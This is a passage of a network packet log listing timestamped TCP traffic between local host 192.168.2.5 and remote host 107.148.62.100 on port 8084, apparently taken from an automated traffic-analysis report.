Dec 18, 2024 13:32:09.099284887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.101368904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.101422071 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.101864100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.102556944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.102607012 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.104340076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.104413033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.104463100 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.104911089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.107243061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.107289076 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.107485056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.108453989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.108510971 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.111942053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.112251997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.112309933 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.112864971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.113763094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.113806963 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.114099979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.114661932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.114713907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.119708061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.119911909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.119966984 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.120338917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.171479940 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.200547934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.200812101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.200882912 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.201306105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.201524973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.201572895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.203797102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.203809977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.203862906 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.204691887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.205033064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.205080986 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.205770969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.206659079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.206708908 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.206942081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.207465887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.207518101 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.209140062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.209328890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.209383965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.209677935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.212335110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.212380886 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.212641001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.212827921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.212881088 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.225785971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.226094961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.226152897 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.226545095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.273053885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.291647911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.292023897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.292088032 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.292499065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.292984962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.293031931 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.293248892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.293905020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.293961048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.306119919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.306315899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.306379080 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.306905985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.307220936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.307266951 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.307547092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.308032036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.308084965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.309971094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.310226917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.310276985 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.310662985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.312995911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.313043118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.313278913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.313930035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.313981056 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.315709114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.316034079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.316083908 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.316555977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.318567038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.318625927 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.318880081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.319437027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.319483995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.321986914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.322285891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.322335958 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.322953939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.327096939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.327153921 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.327451944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.328114033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.328164101 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.330276012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.330657959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.330708981 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.331270933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.336148977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.336211920 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.336505890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.337266922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.337317944 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.414470911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.414825916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.414927006 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.415349960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.415693045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.415755987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.416114092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.416799068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.416852951 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.419537067 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.419935942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.419987917 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.420620918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.423041105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.423091888 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.423183918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.423484087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.423535109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.425105095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.425266981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.425318003 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.425761938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.427521944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.427576065 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.427670002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.428148031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.428201914 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.439377069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.439732075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.439801931 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.440288067 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.489253998 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.506369114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.506534100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.506606102 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.506931067 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.507230997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.507282972 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.507646084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.508169889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.508224964 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.525996923 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.526312113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.526388884 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.526757956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.527311087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.527365923 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.527529955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.527683020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.527733088 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.528492928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.528793097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.528848886 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.528908014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.530680895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.530733109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.531002045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.531333923 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.531389952 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.532336950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.533118010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.533169031 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.533432961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.535521030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.535576105 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.535758972 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.536216974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.536309958 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.536545038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.536881924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.536931038 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.537518024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.537981033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.538033962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.538480997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.541578054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.541646957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.541903019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.542686939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.542737007 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.544226885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.544596910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.544650078 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.545126915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.549753904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.549818993 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.550041914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.550143003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.550184965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.628648043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.628865004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.628927946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.629373074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.629782915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.629832983 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.630182028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.630738974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.631021023 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.632474899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.632678032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.632750034 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.633265972 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.634845972 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.634922981 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.635155916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.635433912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.635478020 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.637293100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.637644053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.637748003 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.640300035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.640431881 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.640491962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.641061068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.653518915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.653587103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.653736115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.654316902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.654378891 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.720084906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.720283031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.720376968 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.720710039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.721591949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.721636057 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.722029924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.723104000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.723150015 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.734127998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.734456062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.734509945 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.734891891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.735372066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.735423088 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.735861063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.736426115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.736483097 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.738243103 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.738487005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.738534927 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.739273071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.742312908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.742360115 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.742440939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.742923021 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.742969990 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.744199991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.744378090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.744421005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.744944096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.746932030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.746974945 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.747185946 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.748083115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.748127937 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.749432087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.750114918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.750159979 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.750677109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.750987053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.751034021 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.751354933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.751895905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.751940012 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.753844976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.754239082 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.754288912 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.754806995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.756130934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.756175041 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.756421089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.756927013 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.756973982 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.761909962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.762187004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.762240887 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.762887955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.814940929 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.842772007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.843040943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.843158960 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.843591928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.843837023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.843885899 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.844424009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.844892025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.844942093 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.846574068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.846848965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.846896887 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.847454071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.848670959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.848714113 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.848862886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.849488020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.849535942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.854882956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.855122089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.855170965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.855834007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.868309975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.868367910 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.868993044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.869724989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.869776964 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.934030056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.934215069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.934286118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.934777021 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.935978889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.935990095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.936033010 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.936695099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.936707020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.936745882 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.937406063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.937455893 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.937923908 CET	8084	49705	107.148.62.100	192.168.2.5
